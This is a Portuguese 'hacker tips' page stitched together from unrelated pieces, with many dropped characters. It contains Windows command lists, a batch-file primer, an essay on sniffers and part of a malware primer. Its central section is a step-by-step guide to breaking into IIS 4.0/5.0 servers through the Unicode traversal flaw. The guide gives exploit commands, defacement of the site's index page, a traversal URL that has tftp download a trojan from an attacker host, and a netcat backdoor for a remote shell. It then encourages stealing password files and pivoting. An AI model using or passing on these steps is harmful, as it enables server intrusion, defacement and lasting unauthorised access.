Dicas Hacker

30
Prompt de Comando (cmd.exe) Aki vai pr vcs os tods os codicos basicos do cmd. Bootcfg Permite ver as configurações do seu menu de boot Defrag Desfragmentador de disco. Oferece as seguintes opções: -a Apenas analisar -f Forçar a desfragmentação mesmo que haja pouco espaço livre. -v Saída detalhada -? Exibir tópico de ajuda. Diskpart Gerencia as partições de um disco. Driverquery Mostra a lista de drivers instalados no Windows e as respectivas propriedades. Fsutil O comando fsutil tem vários complementos que serão listados digitando-o sem nenhum parâmetro. Digite fsutil fsingo drives e terá a lista dos drives no seu micro. Gepresult Este comando mostrará configurações de usuários e de diretivas de grupos. Recover Permite a recuperação de arquvios em disco danificado. Reg Comando para exportar chaves do registro, copiar, restaurar, comparar, etc. Schtasks Para agendar, executar, alterar ou deletar tarefas numa máquina local ou remota com Windows. SFC Comando que permite verificar arquivos de sistemas alterados de forma indevida e recuperar os arquivos originais e oficiais da Microsoft., o que nem sempre será recomendável. Por exemplo, o arquivo uxtheme.dll modificado para permitir o uso de temas voltaria a ser substituído pelo original. Shutdown O comando shutdown permite desligar ou reiniciar o computador de forma imediata ou agendada. Systeminfo Fornece informações básicas sobre o sistema. Tasklist Mostra a lista de processos sendo executados no Windows. Taskkill Permite finalizar algum processo. O comando é quase sempre usado com base nas informações fornecidas pelo tasklist. Por exemplo, para finalizar o Messenger digite "taskkill /PID 1680". A identificação do PID de cada processo sendo executado você ficará sabendo com o comando tasklist. ASSOC Exibe ou modifica associações de extensões de arquivo. AT Agenda comandos e programas para serem executados em um computador. ATTRIB Exibe ou altera atributos de arquivos. BOOTCFG Mostra o boot.ini no prompt de comando BREAK Define ou limpa a verificação estendida CTRL+C.

description

Ensina alguma dicas de segurança

Transcript of Dicas Hacker

Prompt de Comando (cmd.exe)Aki vai pr vcs os tods os codicos basicos do cmd.

Bootcfg Permite ver as configuraes do seu menu de boot

Defrag Desfragmentador de disco. Oferece as seguintes opes:

-a Apenas analisar

-f Forar a desfragmentao mesmo que haja pouco espao livre.

-v Sada detalhada

-? Exibir tpico de ajuda.

Diskpart Gerencia as parties de um disco.

Driverquery Mostra a lista de drivers instalados no Windows e as respectivas propriedades.

Fsutil O comando fsutil tem vrios complementos que sero listados digitando-o sem nenhum parmetro. Digite fsutil fsingo drives e ter a lista dos drives no seu micro.

Gepresult Este comando mostrar configuraes de usurios e de diretivas de grupos.

Recover Permite a recuperao de arquvios em disco danificado.

Reg Comando para exportar chaves do registro, copiar, restaurar, comparar, etc.

Schtasks Para agendar, executar, alterar ou deletar tarefas numa mquina local ou remota com Windows.

SFC Comando que permite verificar arquivos de sistemas alterados de forma indevida e recuperar os arquivos originais e oficiais da Microsoft., o que nem sempre ser recomendvel. Por exemplo, o arquivo uxtheme.dll modificado para permitir o uso de temas voltaria a ser substitudo pelo original.

Shutdown O comando shutdown permite desligar ou reiniciar o computador de forma imediata ou agendada.

Systeminfo Fornece informaes bsicas sobre o sistema.

Tasklist Mostra a lista de processos sendo executados no Windows.

Taskkill Permite finalizar algum processo. O comando quase sempre usado com base nas informaes fornecidas pelo tasklist. Por exemplo, para finalizar o Messenger digite "taskkill /PID 1680". A identificao do PID de cada processo sendo executado voc ficar sabendo com o comando tasklist.

ASSOC Exibe ou modifica associaes de extenses de arquivo.

AT Agenda comandos e programas para serem executados em um computador.

ATTRIB Exibe ou altera atributos de arquivos.

BOOTCFG Mostra o boot.ini no prompt de comando

BREAK Define ou limpa a verificao estendida CTRL+C.

CACLS Exibe ou modifica listas de controle de acesso (ACLs) de arquivos.

CALL Chama um programa em lotes a partir de outro.

CHCP Exibe ou define o nmero da pgina de cdigo ativa.

CHKDSK Verifica um disco e exibe um relatrio de status.

CHKNTFS Exibe ou modifica a verificao do disco na inicializao.

CLS Limpa a tela

CMD Abre uma outra janela de prompt.

COLOR Define as cores padro de primeiro plano e do plano de fundo do console

COMP Compara o contedo de dois arquivos ou grupos de arquivos.

COMPACT Exibe ou altera a compactao de arquivos.

CONVERT Converte volumes FAT em NTFS.

COPY Copia um ou mais arquivos para outro local.

DATE Mostra a data atual e permite alter-la.

DISKCOMP Compara o contedo de dois disquetes.

DISKCOPY Copia o contedo de um disquete para outro.

DISKPART Faz particionamento de disco

DOSKEY Edita linhas de comando, volta a chamar comandos do Windows e cria macros.

ECHO Exibe mensagens ou ativa ou desativa o echo de comandos.

ENDLOCAL Encerra a localizao de alteraes de ambiente em um arquivo em lotes.

EXIT Sai do programa CMD.EXE (interpretador de comandos).

FC Compara dois arquivos ou grupos de arquivos e exibe as diferenas entre eles.

FIND Procura uma seqncia de texto em um arquivo ou arquivos.

FINDSTR Procura seqncias de texto em arquivos.

FOR Executa um determinado comando para cada arquivo em um grupo de arquivos.

FORMAT Formata um disco rgido ou disquete.

FTYPE Exibe ou modifica os tipos de arquivo utilizados em associaes de extenses de arquivos.

GOTO Direciona o interpretador de comandos do Windows para uma linha identificada em um programa em lotes.

GRAFTABL Permite que o Windows exiba um conjunto de caracteres estendidos em modo grfico.

HELP Fornece informaes de ajuda sobre comandos do Windows.

HOSTNAME D o nome do host

IF Realiza processamento condicional em arquivos em lotes.

IPCONFIG Mostra detalhes das configuraes de IP

LABEL Cria, altera ou exclui o rtulo de volume de um disco.

MODE Configura um dispositivo do sistema.

MORE Exibe a sada fazendo pausa a cada tela.

MOVE Move um ou mais arquivos de uma pasta para outra pasta.

PAGEFILECONFIG Configura memria virtual

PATH Exibe ou define um caminho de pesquisa para arquivos executveis.

PAUSE Suspende o processamento de um arquivo em lotes e exibe uma mensagem.

PING Checa sua conexo de rede disponvel

POPD Restaura o valor anterior da pasta atual salva por PUSHD.

PRINT Imprime um arquivo de texto.

PROMPT Altera o prompt de comando do Windows.

PUSHD Salva a pasta atual e, em seguida, altera a mesma.

REM Grava comentrios (observaes) em arquivos em lotes.

REPLACE Substitui arquivos.

ROUT Mostra detalhes do parmetro da interface de rede

SCHTASKS Agenda e executa algum processo

SET Exibe, define ou remove variveis de ambiente do Windows.

SETLOCAL Inicia a localizao de alteraes de ambiente em um arquivo em lotes.

SHIFT Altera a posio dos parmetros substituveis em um arquivo em lotes.

SORT Classifica a entrada.

START Inicia uma janela separada para executar um programa ou comando especificado.

SUBST Associa um caminho a uma letra de unidade.

TITLE Define o ttulo da janela para uma sesso do CMD.EXE.

TREE Exibe graficamente a estrutura de pastas de uma unidade ou caminho.

TYPE Exibe o contedo de um arquivo de texto.

VER Mostra a verso do Windows.

VERIFY Faz com que o Windows verifique se os arquivos esto gravados corretamente em um disco.

VOL Exibe um rtulo e nmero de srie de volume de disco.

XCOPY Copia diretrios com seus subdiretrios.

APPEND Acrescebtar um Arquivo

ASCII DEFINIR UM TIPO DE TRANFERNCIA ASCII

BELL EMITIR UM AVISO SONORO AO TRMINO DO COMANDO

BINARY DEFINIR TIPO DE TRANSFERNCIA BINRIA

BYE TERMINAR SEO DE FTP E SAIR

CD ALTERAR A PASTA DE TRABALHO REMOTA

CLOSE TERMINAR SESSO DE FTP

DELETE EXCLUIR PASTAS DE TRABALHO REMOTA

DEBUG LIGAR/DESLIGAR MODO DE DEPURAO

DIR LISTAR CONTEDO DA PASTA REMOTA

DISCONNECT TERMINAR SESSO DE FTP

GET RECEBER ARQUIVO

GLOB LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE ARQUIVOS LOCAIS

HASH LIGAR/DESLIGAR IMPRESSO "#" PARA CADA BUFFER TRANSFERIDO

HELP AJUDA DO FTP

LCD ALTERAR A PASTA DE TRABALHO LOCAL

LITERAL ENVIAR UM COMANDO DE FTP ARBITRIO

LS LISTAR O CONTEDO DA PASTA REMOTA

MDELETE EXCLUI VRIOS ARQUIVOS

MDIR LISTAR O CONTEDO DE VRIAS PASTAS REMOTAS

M GET OBTER VRIOS ARQUIVOS

MKDIR CRIA UMA PASTA NA MQUINA NA MQUINA REMOTA

MLS LISTAR O CONTEDO DE VRIAS PASTAS REMOTAS

MPUT ENVIAR VRIOS ARQUIVOS

OPEN CONECTAR AO FTP REMOTO

PROMPT FORAR PROMPT INTERATIVO EM MLTIPLOS COMANDOS

PUT ENVIAR UM ARQUIVO

PWD IMPRIMIR A PASTA DE TRABALHO NA MQUINA REMOTA

QUIT TERMINAR A SESSO DE FTP E SAIR

QUOT ENVIAR UM COMANDO ARBITRRIO

RECV RECEBER ARQUIVO

REMOTEHELP OBTER AJUDA A PARTIR DO SERVIDOR REMOTO

RENAME RENOMEAR ARQUIVO

RMDIR REMOVER PASTA DA MQUINA REMOTA

SEND ENVIAR ARQUIVO

STATUS MOSTRAR STATUS ATUAL

TRACE LIGAR/DESLIGAR RASTREAMENTO DE PACOTES

TYPE DEFINIR O TIPO DE TRANSFERNCIA DE ARQUIVOS

USER ENVIAR INFORMAES DE NOVO USURIO

Os comandos abaixo listam comandos adicionais do Windows XP Pro:

eventcreate - Permite ao administrador criar uma mensagem e identificao do evento personalizadas em um log de eventos especificado.

eventquery - Lista os eventos ou as propriedades de um evento de um ou mais arquivo log.

eventtriggers - Mostra e configura disparadores de evento.

getmac - Mostra o endereo MAC de um ou mais adaptador de rede.

helpctr - Inicia o Centro de Ajuda e Suporte.

ipseccmd - Configura o Internet Protocol Security (IPSec)

logman - Gerencia o servio Logs e alertas de desempenho.

openfiles - Busca, mostra ou termina arquivos abertos compartilhados.

pagefileconfig - Mostra e configura a memria virtual.

perfmon - Abre o monitor do sistema.

prncnfg - Configure ou mostra as configuraes de impressora.

prndrvr - Adiciona, deleta e lista drivers de impressoras.

prnjobs - Pausa, continua ou cancela lista de documentos a serem impressos.

prnmngr - Adiciona, deleta e lista impressoras conectadas, alm da impressora default.

prnport - Cria, deleta e lista portas de impressora TCP/IP

prnqctl - Imprime uma pgina de teste, pausa ou reinicia um documento a ser impresso.

schtasks - Permite que um administrador crie, exclua, consulte, altere, execute e termine tarefas agendadas em um sistema local ou remoto.

systeminfo - Busca no sistema informao sobre configuraes bsicas.

typeperf - grava dados de desempenho na janela de comando ou em um arquivo de log. Para interromper Typeperf, pressione CTRL+C.

Outros comandos, mas no do CMD, Tecla Windows esquerda do teclado, aqui no meu a bandeirinha do Tio Bill(Microsoft).

Todo teclado atual traz uma tecla Windows que pode ser usada em conjunto com alguma outra tecla para servir de atalho para alguma atividade. Veja abaixo a relao de atalhos da tecla Windows e tire mais proveito dela:

Windows: Mostra o Menu Iniciar

Windows + D: Minimiza ou restaura todas as janelas

Windows + E: Abre Meu computador

Windows + F: Abre o Pesquisar para arquivos

Windows + R: Mostra a janela Executar

Windows + L: Tranca a tela

Windows + U: Abre o Gerenciador de Utilitrios

Windows + CTRL + F: Mostra o Pesquisar para computador (em rede)

Windows + Shift + M: Desfaz minimizar (para todas as janelas)

Windows + F1: Para Ajuda e Suporte

Windows + BREAK: Mostra as Propriedades de Sistema

- Comandos relacionados aos Servios do Windows que podem ser digitados no menu Iniciar / Executar:

compmgmt.msc - gerenciar o computador

devmgmt.msc - gerenciamento de dispositivos

diskmgmt.msc - gerenciamento de discos

dfrg.msc - desfragmentador

eventvwr.msc - visualizar eventos

fsmgmt.msc - pastas compartilhadas

gpedit.msc - diretivas de grupo

lusrmgr.msc - usurios e grupos locais

perfmon.msc - monitor de performance

rsop.msc - conjunto de diretivas resultante

secpol.msc - configuraes de segurana

services.msc - servios gerais

control userpasswords2 - contas de usurio

regedit - registro do windows

eudceit - paint

fsquirt - bluetooh

drwatson - verificar erros

drwtsn32 - lista de erros

logoff - fazer logoff - finalizar a sesso

magnify - lente de aumento

msconfig - ultilitrio de configurao do sistema

mstsc - conectar ao outro computador - invadir

osunist - desistalar o windows

rtcshare - compartilhar arquivos com outro computador

syskey - proteger os dados

virifier - virificar driver

pagefileconfig -

gpedit - diretiva do computador

mmc - abrir outros comandos

nslookup - talvez seja o ip do computador

Dica de Comandos DOS postado pelo colega thiagobodruk

Comandos

title nome define um nome no ttulo da pgina.

Echo Exibe uma string na tela.

Ex.: echo teste (escreve teste na tela)

echo. cria uma linha em branco.

@echo off - Desativa a exibio dos comandos na tela. Deve ser adicionado primeira linha de um arquivo de lote MS-DOS (*.BAT).

Cls Limpa a tela.

set string = valor; - define uma varivel.

Ex.: set a = 10; (define varivel a com valor igual a 10)

%string% - chama varivel.

Ex.: set a = teste;

echo %a% (primeiro define a com valor igual a teste, segunda linha escreve na tela o conteda da varivel a, no caso a palavra teste)

pause - pausa as execues, para prosseguir necessrio pressionar alguma tecla.

md nome - cria um diretrio chamado nome.

rd nome - remove o diretrio vazio nome.

cd nome - direciona prompt para o diretrio nome.

copy diretrio origem diretriodestino - copia um arquivo ou pasta de um diretrio origem para um diretrio destino.

Ex.: copy C:\windows\rundll32.exe C:\Pasta

del nome deleta arquivo nome.

deltree diretrio deleta diretrio no-vazio e todo seu contedo. Este comando pede confirmao (Y/N), para confirmar direto, usa-se deltree/y.

renam nomeantigo.extenso nomenovo.extenso - renomeia arquivos ou pastas.

Ex.: renam C:\windows\mistic.exe C:\windows\barret.exe

dir define contedo do diretrio.

:nome cria um pargrafo de orientao chamado nome.

goto nome direciona a "leitura" para o pargrafo nome.

call arquivo chama um arquivo de lote do MS-DOS.

start arquivo inicia uma aplicao do Windows.

date exibe/altera data.

time exibe/altera hora.

exit fecha o prompt do MS-DOS.

Observaes

- Para saber informaes sobre determinado comando, sua sintaxe, etc, basta digitar comando/?. Ira aparecer na tela uma "ajuda" sobre o comando.

- super importante voc saber no que est mexendo, algumas alteraes podem comprometer seu computador.

- Existem alguns comandos de programas como o shutdowm, por exemplo, mas so muitos, mais fcil voc consultar a ajuda deles /?.

Como criar um arquivo de lote? (*.BAT)

Abra o bloco de notas do WinXP, digite os comandos em linhas de acordo com a sua inteno. Salve Como nomedesejado.BAT. importante esta notao, pois o que vai definir o arquivo como sendo um arquivo de lote.

Editado

Comandos do MS-DOS

Este tutorial tem por objetivo mostrar os comandos do DOS. Muitas pessoas pensam que so inteis mas caso ocorra alguma emergncia no PC voc ir precisar destes comandos ...

1. Diferenas entre comandos internos e externos

2. Os comandos internos

Editado

P/facilitar se algum quiser arquivar ou imprimir

Sniffers so programas que tem como princpio capturar pacotes de rede. Ele analisa o trafego de rede e identifica reas vulnerveis. Suponha que sua rede esteja enfrentando lentides, quedas ou corrupes de dados. Isso pode ser um sinal de invaso!

Os Sniffers variam em sua funcionalidade e projeto. Alguns analisam somente um protocolo, enquanto outros podem analisar centenas. Como uma regra geral, os sniffers mais modernos analisaro pelo menos os protocolos:

Ethernet padroTCP/IPIPXDECNetOs sniffers capturam pacotes de rede colocando a interface de rede Ethernet por exemplo, em modo passivo. Em redes locais os dados trafegam de uma mquina a outra por meio do cabo em pequenas unidades chamadas frames. Esses frames so divididos em sees que carregam informaes especficas. Os sniffers impem um risco de segurana pela forma como os frames so transportados e entregues.

Cada estao de trabalho em uma rede local tem seu prprio endereo de hardware. Esse endereo identifica de maneira exclusiva essa mquina em relao a todas as outras na rede. Quando voc envia uma mensagem atravs da rede local, seus pacotes so enviados para todas as mquinas conectadas (broadcast). Isso quer dizer que todas as mquinas na rede podero ouvir esse trfego, mas somente respondero aos dados endereados especificamente a elas.

Se uma interface de rede da estao de trabalho operar em modo passivo, ela pode capturar todos os pacotes e frames na rede. Uma estao de trabalho configurada dessa forma (juntamente com o software) um sniffer.

Os Sniffers representam um alto nvel de risco, porque:

Os sniffers podem capturar senhas de e-mail, carto de crdito e outras contasOs sniffers podem capturar logins, e-mails, mensagens confidenciais etc.Os sniffers podem ser utilizados para abrir brechas na segurana de redes prximas ou adquirir acesso de alto nvel.De fato, a existncia de um sniffer no autorizado em sua rede pode indicar que seu sistema j est comprometido. Os sniffers capturaro todos os pacotes na rede mas, na prtica, muito relativo. Um ataque sniffer no to fcil quanto parece, ele requer conhecimento em redes. Simplesmente configurar um sniffer e deix-lo trabalhando no funcionar por muito tempo, porque mesmo uma rede de apenas cinco estaes transmite milhares de pacotes por hora. Em pouco tempo o arquivo de log de um sniffer pode facilmente encher um disco rgido (se estiver capturando todos os pacotes).

Para superar esse problema, os crackers geralmente armazenam somente os primeiros 200~300 bytes de cada pacote. O nome de usurio e senha esto contidos nessa parte, tudo o que eles realmente querem.

criptografiaA tecnologia de segurana, em relao a este problema, desenvolveu-se consideravelmente. Alguns sistemas operacionais j empregam criptografia no nvel de pacote e, mesmo se um ataque sniffer conseguir obter dados valiosos, esses dados estaro praticamente ilegveis. Isso representa um obstculo adicional a ser ultrapassado somente por aqueles com um conhecimento mais profundo de segurana, criptografia e rede.

Os sniffers so extremamente difceis de serem detectados porque so programas passivos. Eles no armazenam dados especficos no registro do sistema operacional ou disco rgido, a menos que seu usurio seja muito desinformado (e capture todos os pacotes por completo), eles consomem poucos recursos de rede. possvel localizar um sniffer em uma mquina usando o MD5, desde que tenha um banco de dados decente dos arquivos originais da instalao. Voc precisar baixar o script md5check que automatiza o processo.

Certamente, pesquisar por um sniffer em uma nica mquina fcil. Entretanto, localizar um sniffer em uma rede grande difcil. Na internet existem ferramentas que podero lhe ajudar.

Suponha que algum entre em um escritrio vazio, desconecte uma mquina da rede e conecte um laptop com o mesmo IP. Existe tambm sniffers assim. Este ainda mais difcil de se detectar, a menos que voc esteja utilizando mapas de rede e esteja em constante verificao do mesmo.

Se voc desconfia que algum grampeou sua rede, procure por ferramentas que lhe auxiliaro. Uma ferramenta que voc pode testar chama-se TDR (Time Domain Reflectometer). Os TDRs medem a propagao ou flutuao de ondas eletromagnticas. Um TDR anexado sua rede local revelar pontes no autorizadas sugando os dados.

Solues preventivas so difceis e praticamente inviveis. Em vez disso, adote uma abordagem mais defensiva. H duas defesas muito importantes contra sniffers:

Topologia segmentadaSesses criptografadasOs sniffers somente podem capturar os dados no mesmo segmento de rede. Isso significa que quanto mais voc segmenta sua rede, menos informaes um sniffer pode coletar. H trs interfaces de rede que um sniffer no pode vencer:

SwitchesRoteadoresBridgesSesses criptografadas fornecem uma soluo diferente. Em vez de preocupar-se com dados sendo capturados, voc simplesmente os criptografa, ou seja, retira sua legividade. O SSH (Secure Shell) um exemplo de programa que fornece comunicao criptografada, substituindo o antigo Telnet.

Dicas para invadir servidoresTodas as dicas contidas nestarea so totalmente de sua responsabilidade, esto aqui apenas com o intuito detrazer as informaes para que vocs internautas tenham um conhecimento alm donormal e saiba como se defender na internet, portanto eu no me responsabilizopor qualquer ato imbecil que voc venha a fazer com as informaes aquicontidas.

Tentaremos aqui desenvolver um paper explicandopasso--passo de como um "hacker" faz para obter acesso num servidor rodandoWindowsNT Microsoft IIS 4.0 / 5.0 Extended UNICODE Directory Traversalvulnervel e como corrigir essa vulnerabilidade.

Obs: estatcnica j bemvelhinha

Segue abaixo as verses dosSistemas Operacionais e Programas Vulnerveis.

::Vulnervel:

::Microsoft IIS 5.0

+Microsoft Windows NT 2000

::Microsoft IIS 4.0

- Microsoft Windows NT 4.0

+Microsoft BackOffice 4.5

- Microsoft Windows NT 4.0

+Microsoft BackOffice 4.0

- Microsoft Windows NT 4.0

Vamos ao que interessa

INDICE

1 Procurar por um host vulnervel.

2 Testar se o host realmente vulnervel.

2.1 Fazer um scanner no host alvo.

2.2 Testar o exploit no host alvo antes mesmo de verificar se ele estvulnervel ou no.

3 Listar os arquivos e pastas contidos no servidor vulnervel.

4 Alterar o contedo do site do host vulnervel.

5 TCNICAS DE HAXORS.

6 AGORA VOC UM HACKER. OU NO?

7 MAIS EXPLOITS.

8 CORREO.

1) Procurar por um hostvulnervel

Geralmente os hosts maisprocurados so os mais conhecidos, como sites do governo e empresasnacionalmente e mundialmente conhecidas. Mas se voc quer dar uma de "hacker"pegue uma hp bem fulerinha..

2) Testar se o host realmente vulnervel.

Existem duas maneiras bsicas.

2.1 Fazer um scanner no hostalvo.

Existem scanners que vasculhamservidores e servios que esto sendo executados. Esses scanners verificam se halgum servio vulnervel, que ainda no foi corrigido. Para testar essavulnerabilidade existem scanners tanto para windows quanto pra linux.

Para windows voc pode obter o

SSS - Security ShadowScanner (j vem com seu crack dentro do .zip)

Para linux um scanner feito perl que quando encontra um HOST vulnervel eleinidica o url de onde pode-se obter o exploit para explorar essavulnerabilidade.

Segue abaixo como us-los:

- SSS (Security Shadow Scanner)No h mistrio de como utiliz-lo. Basta preencher o campo com o IP ou HOST doalvo e iniciar o "scanneamento". Quando encontrar ele colocar em vermelho umaviso dizendo que o HOST est vulnervel ao msdac.dll.

- unicheck.pl - Veja o queacontece quando ele acha um HOST vulnervel.

perl unicheck.pl XXX.XXX.XXX.XXX:80

- Pode ver que ele avisa que o host vulnervel. THIS HOST IS VULNERABLE .

Avisa onde encotrar o exploit para explorar a vulnerabilidade.http://packetstorm.securify.com/0010-expl/unicodexecute2.pl2.2 Testar o exploit no host alvoantes mesmo de verificar se ele est vulnervel ou no..

Agora iremos testar o exploit nonosso host alvo.

"dir c:inetpub"

Como pode ver acima, foi listado os diretrios dentro do diretrio c:inetpub.Assim o "hacker" tem acesso todo o seus arquivos, podendo assim alterar o siteda empresa que infelizmente no tem uma equipe separada da equipe deadministrao responsvel pela segurana da empresa, que no s se limita segurana virtual. Como o "hacker" pode ler o diretrio "c:inetpub" ele tambmpode ter acesso ao diretrio padro do website "c:inetpubwwwroot" ou outrodiretrio que hospeda os arquivos do site da empresa como pode ver abaixo.

3) Listar os arquivos e pastascontidos no servidor vulnervel.

Iremos listar todos os arquivos ediretrios dentro de uma determinada pasta.>

perl xpu.plwww.host-alvo.com.br:80"dir c:inetpubwwwroot"

4) Alterar o contedo do sitedo host vulnervel.

perl unicodexecute.plwww.host-alvo.com.br:80''echo SITE HACKED BY Remote Menace!! > c:\inetpubwwwroot\index.htm''

Pronto... agora voc alterou o site da empresa que encontrou vulnervel. Quandofor acessar o site da empresa que encontrou vulnervel voc encontrar aseguinte mensagem no site:

" SITE HACKED BY Remote Menace! "

assim que praticamente o mundo inteiro est sendo invadido.

5) TCNICAS DE HAXORS

Bom..

. agora varia de pessoa para pessoa, conheceimento para conhecimento,criatividade para criatividade. O jeito de como voc pode obter maioresinformaes a partir da explorao da vulnerabilidade do unicode s depender devoc.

Para adiantar o seu lado, vamos adiantar alguma coisa. Com o acesso j garantidoao servidor voc poder fazer o que bem entende. Geralmente os "hackers" doBrasil se contentam em alterar a pagina e esquecer de "backdoorizar" as mquinasque eles conseguem invadir. De certa forma isso muito bom, pois o que parece que eles querem somente manifestar o seu descontentamento com o governo e aadministrao que o Brasil tem. No que isso seja certo ou que concordamos com oque eles fazem. Infelizmente as pessoas ainda no tem conhecimento do queacontece e o que realmente o underground e mesmo o que um HACKER no sentidoprofundo.

Para voc obter um maior acesso rede, ou seja, conseguir acesso outras mquinas, outros tipos de acessos,abrir um terminal remoto e at mesmo continuar tendo acesso mquina, vocprecisa fazer algumas coisas, mesmo porque o servidor no ficar vulnervel parasempre.

Voc pode utilizar ferramentas que j vem instaladas por default (padro) noWindows NT e 2000 para "facilitar" a sua vida. A dica que daremos aqui utilizar o TFTP para poder abrir um terminal remoto posteriormente e continuartendo acesso mquina mesmo depois de sua correo.

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"

+ip.de.onde.esta.o.trojan+GET+trojan.exe+c:\winnt\system32\trojan.exe

.

agora rode o trojan com:

/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe

Bom...

Agora voc instalou o nc no servidor, poder abrir um terminal remoto no WindowsNT, tendo acesso completo ao sistema.

Como foi dito antes, depende de voc continuar tendo acesso ao servidor. E essastcnicas esto sendo aprimoradas a cada dia. Voc acha que pode conseguir teracesso ao arquivo SAM? Voc pode descriptografar as senhas dos usurios? Vocpode utilizar o terminal que voc abriu e tentar ter acesso outras mquinaspara no haver um reastreamento direto para sua mquina?Voc pode conseguiracesso rede interna (10.0.0.0 por exemplo) se houver? Voc pode sniffar a redea partir dessa mquina e obter acesso s outras mquinas?

Como pode ver... pode se fazer MUITA coisa alm de modificar uma pgina apartirde um bug que CENTENAS de servidores ainda continuam vulnerveis por todo omundo.

6) AGORA VOC UM HACKER. OUNO?

Voc se considera um hacker?

Bom...

7) MAIS EXPLOITS.

Mais exploits:

iis-zang.c

iis-zang.exe

iis-zang.obsd

iis-zang.linux

unicodecheck.pl

unicodexecute.pl

unicodexecute2.pl

8) CORREO.

Contratar um Security Officerpara cuidar da segurana da sua empresa.

Se manter o mais atualizado possvel.

Internet Informatio Server 4.0

http://www.microsoft.com/ntserver/nts/downloads/Internet Informatio Server 5.0

Cdigos maliciosos (Malware)

Cdigos maliciosos (malware) so programas especificamente desenvolvidos para executar aes danosas e atividades maliciosas em um computador. Algumas das diversas formas como os cdigos maliciosos podem infectar ou comprometer um computador so:

pela explorao de vulnerabilidades existentes nos programas instalados;pela auto-execuo de mdias removveis infectadas, como pen-drives;pelo acesso a pginas Web maliciosas, utilizando navegadores vulnerveis;pela ao direta de atacantes que, aps invadirem o computador, incluem arquivos contendo cdigos maliciosos;pela execuo de arquivos previamente infectados, obtidos em anexos de mensagens eletrnicas, via mdias removveis, em pginas Web ou diretamente de outros computadores (atravs do compartilhamento de recursos).Uma vez instalados, os cdigos maliciosos passam a ter acesso aos dados armazenados no computador e podem executar aes em nome dos usurios, de acordo com as permisses de cada usurio.

Os principais motivos que levam um atacante a desenvolver e a propagar cdigos maliciosos so a obteno de vantagens financeiras, a coleta de informaes confidenciais, o desejo de autopromoo e o vandalismo. Alm disto, os cdigos maliciosos so muitas vezes usados como intermedirios e possibilitam a prtica de golpes, a realizao de ataques e a disseminao de spam (mais detalhes nos Captulos Golpes na Internet, Ataques na Internet e Spam, respectivamente).

Os principais tipos de cdigos maliciosos existentes so apresentados nas prximas sees.

4.1. Vrus

Vrus um programa ou parte de um programa de computador, normalmente malicioso, que se propaga inserindo cpias de si mesmo e se tornando parte de outros programas e arquivos.

Para que possa se tornar ativo e dar continuidade ao processo de infeco, o vrus depende da execuo do programa ou arquivo hospedeiro, ou seja, para que o seu computador seja infectado preciso que um programa j infectado seja executado.

O principal meio de propagao de vrus costumava ser os disquetes. Com o tempo, porm, estas mdias caram em desuso e comearam a surgir novas maneiras, como o envio de e-mail. Atualmente, as mdias removveis tornaram-se novamente o principal meio de propagao, no mais por disquetes, mas, principalmente, pelo uso de pen-drives.

H diferentes tipos de vrus. Alguns procuram permanecer ocultos, infectando arquivos do disco e executando uma srie de atividades sem o conhecimento do usurio. H outros que permanecem inativos durante certos perodos, entrando em atividade apenas em datas especficas. Alguns dos tipos de vrus mais comuns so:

Vrus propagado por e-mail: recebido como um arquivo anexo a um e-mail cujo contedo tenta induzir o usurio a clicar sobre este arquivo, fazendo com que seja executado. Quando entra em ao, infecta arquivos e programas e envia cpias de si mesmo para os e-mails encontrados nas listas de contatos gravadas no computador.Vrus de script: escrito em linguagem de script, como VBScript e JavaScript, e recebido ao acessar uma pgina Web ou por e-mail, como um arquivo anexo ou como parte do prprio e-mail escrito em formato HTML. Pode ser automaticamente executado, dependendo da configurao do navegador Web e do programa leitor de e-mails do usurio.Vrus de macro: tipo especfico de vrus de script, escrito em linguagem de macro, que tenta infectar arquivos manipulados por aplicativos que utilizam esta linguagem como, por exemplo, os que compe o Microsoft Office (Excel, Word e PowerPoint, entre outros).Vrus de telefone celular: vrus que se propaga de celular para celular por meio da tecnologia bluetooth ou de mensagens MMS (Multimedia Message Service). A infeco ocorre quando um usurio permite o recebimento de um arquivo infectado e o executa. Aps infectar o celular, o vrus pode destruir ou sobrescrever arquivos, remover ou transmitir contatos da agenda, efetuar ligaes telefnicas e drenar a carga da bateria, alm de tentar se propagar para outros celulares.4.2. Worm

Worm um programa capaz de se propagar automaticamente pelas redes, enviando cpias de si mesmo de computador para computador.

Diferente do vrus, o worm no se propaga por meio da incluso de cpias de si mesmo em outros programas ou arquivos, mas sim pela execuo direta de suas cpias ou pela explorao automtica de vulnerabilidades existentes em programas instalados em computadores.

Worms so notadamente responsveis por consumir muitos recursos, devido grande quantidade de cpias de si mesmo que costumam propagar e, como consequncia, podem afetar o desempenho de redes e a utilizao de computadores.

O processo de propagao e infeco dos worms ocorre da seguinte maneira:

Identificao dos computadores alvos: aps infectar um computador, o worm tenta se propagar e continuar o processo de infeco. Para isto, necessita identificar os computadores alvos para os quais tentar se copiar, o que pode ser feito de uma ou mais das seguintes maneiras:efetuar varredura na rede e identificar computadores ativos;aguardar que outros computadores contatem o computador infectado;utilizar listas, predefinidas ou obtidas na Internet, contendo a identificao dos alvos;utilizar informaes contidas no computador infectado, como arquivos de configurao e listas de endereos de e-mail.Envio das cpias: aps identificar os alvos, o worm efetua cpias de si mesmo e tenta envi-las para estes computadores, por uma ou mais das seguintes formas:como parte da explorao de vulnerabilidades existentes em programas instalados no computador alvo;anexadas a e-mails;via canais de IRC (Internet Relay Chat);via programas de troca de mensagens instantneas;includas em pastas compartilhadas em redes locais ou do tipo P2P (Peer to Peer).Ativao das cpias: aps realizado o envio da cpia, o worm necessita ser executado para que a infeco ocorra, o que pode acontecer de uma ou mais das seguintes maneiras:imediatamente aps ter sido transmitido, pela explorao de vulnerabilidades em programas sendo executados no computador alvo no momento do recebimento da cpia;diretamente pelo usurio, pela execuo de uma das cpias enviadas ao seu computador;pela realizao de uma ao especfica do usurio, a qual o worm est condicionado como, por exemplo, a insero de uma mdia removvel.Reincio do processo: aps o alvo ser infectado, o processo de propagao e infeco recomea, sendo que, a partir de agora, o computador que antes era o alvo passa a ser tambm o computador originador dos ataques.4.3. Bot e botnet

Bot um programa que dispe de mecanismos de comunicao com o invasor que permitem que ele seja controlado remotamente. Possui processo de infeco e propagao similar ao do worm, ou seja, capaz de se propagar automaticamente, explorando vulnerabilidades existentes em programas instalados em computadores.

